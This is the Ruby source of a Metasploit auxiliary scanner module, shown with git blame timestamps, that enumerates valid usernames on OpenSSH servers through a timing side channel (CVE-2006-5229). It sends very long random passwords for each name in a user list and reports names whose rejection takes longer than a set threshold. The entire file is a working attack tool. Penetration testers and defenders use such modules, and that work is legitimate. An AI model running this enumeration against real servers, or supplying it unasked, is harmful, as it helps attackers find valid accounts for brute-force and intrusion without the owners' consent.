metasploit-framework/modules/auxiliary/scanner/ssh/ssh_enumusers.rb

185 lines
4.6 KiB
Ruby
Raw Normal View History

2014-03-28 15:23:48 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-03-28 15:23:48 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::CommandShell
2014-04-23 15:00:34 +00:00
def initialize(info = {})
super(update_info(info,
2014-03-28 15:23:48 +00:00
'Name' => 'SSH Username Enumeration',
'Description' => %q{
This module uses a time-based attack to enumerate users on an OpenSSH server.
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user.
},
'Author' => ['kenkeiras'],
'References' =>
[
['CVE', '2006-5229'],
['OSVDB', '32721'],
['BID', '20418']
],
2014-03-28 15:23:48 +00:00
'License' => MSF_LICENSE
2014-04-23 15:00:34 +00:00
))
2014-03-28 15:23:48 +00:00
register_options(
[
Opt::Proxies,
2014-04-23 15:00:34 +00:00
Opt::RPORT(22),
2014-04-18 19:56:17 +00:00
OptPath.new('USER_FILE',
2014-04-23 15:00:34 +00:00
[true, 'File containing usernames, one per line', nil]),
OptInt.new('THRESHOLD',
2014-04-23 15:00:34 +00:00
[true,
'Amount of seconds needed before a user is considered ' \
'found', 10])
2014-03-28 15:23:48 +00:00
], self.class
)
register_advanced_options(
[
OptInt.new('RETRY_NUM',
[true , 'The number of attempts to connect to a SSH server' \
2014-04-23 15:00:34 +00:00
' for each user', 3]),
OptInt.new('SSH_TIMEOUT',
[false, 'Specify the maximum time to negotiate a SSH session',
10]),
OptBool.new('SSH_DEBUG',
[false, 'Enable SSH debugging output (Extreme verbosity!)',
false])
2014-03-28 15:23:48 +00:00
]
)
end
def rport
datastore['RPORT']
end
def retry_num
datastore['RETRY_NUM']
end
def threshold
datastore['THRESHOLD']
end
2014-03-28 15:23:48 +00:00
2014-04-29 15:07:42 +00:00
# Returns true if a nonsense username appears active.
def check_false_positive(ip)
2014-04-29 15:14:41 +00:00
user = Rex::Text.rand_text_alphanumeric(8)
2014-04-29 15:07:42 +00:00
result = attempt_user(user, ip)
return(result == :success)
end
2014-03-28 15:23:48 +00:00
def check_user(ip, user, port)
pass = Rex::Text.rand_text_alphanumeric(64_000)
2014-03-28 15:23:48 +00:00
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => port,
:disable_agent => true,
:password => pass,
:config => false,
:proxies => datastore['Proxies']
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
start_time = Time.new
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
2014-04-18 19:46:51 +00:00
Net::SSH.start(ip, user, opt_hash)
2014-03-28 15:23:48 +00:00
end
rescue Rex::ConnectionError, Rex::AddressInUse
return :connection_error
rescue Net::SSH::Disconnect, ::EOFError
return :success
rescue ::Timeout::Error
return :success
rescue Net::SSH::Exception
end
finish_time = Time.new
if finish_time - start_time > threshold
:success
2014-03-28 15:23:48 +00:00
else
:fail
2014-03-28 15:23:48 +00:00
end
end
def do_report(ip, user, port)
report_auth_info(
2014-04-23 15:00:34 +00:00
:host => ip,
:port => rport,
:sname => 'ssh',
:user => user,
2014-03-28 15:23:48 +00:00
:active => true
)
end
# Because this isn't using the AuthBrute mixin, we don't have the
# usual peer method
def peer(rhost=nil)
"#{rhost}:#{rport} - SSH -"
end
2014-03-28 15:23:48 +00:00
def user_list
if File.readable? datastore['USER_FILE']
File.new(datastore['USER_FILE']).read.split
else
raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
end
2014-03-28 15:23:48 +00:00
end
def attempt_user(user, ip)
attempt_num = 0
ret = nil
while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
if attempt_num > 0
2014-04-22 20:16:16 +00:00
Rex.sleep(2 ** attempt_num)
print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"
2014-03-28 15:23:48 +00:00
end
ret = check_user(ip, user, rport)
attempt_num += 1
end
2014-04-23 15:00:34 +00:00
ret
2014-03-28 15:23:48 +00:00
end
def show_result(attempt_result, user, ip)
case attempt_result
when :success
print_good "#{peer(ip)} User '#{user}' found"
2014-03-28 15:23:48 +00:00
do_report(ip, user, rport)
when :connection_error
print_error "#{peer(ip)} User '#{user}' on could not connect"
2014-03-28 15:23:48 +00:00
when :fail
print_debug "#{peer(ip)} User '#{user}' not found"
2014-03-28 15:23:48 +00:00
end
end
def run_host(ip)
2014-04-29 15:07:42 +00:00
print_status "#{peer(ip)} Checking for false positives"
if check_false_positive(ip)
print_error "#{peer(ip)} throws false positive results. Aborting."
return
else
2014-04-29 15:14:41 +00:00
print_status "#{peer(ip)} Starting scan"
2014-04-29 15:07:42 +00:00
user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
end
2014-03-28 15:23:48 +00:00
end
2014-04-23 15:00:34 +00:00
2014-03-28 15:23:48 +00:00
end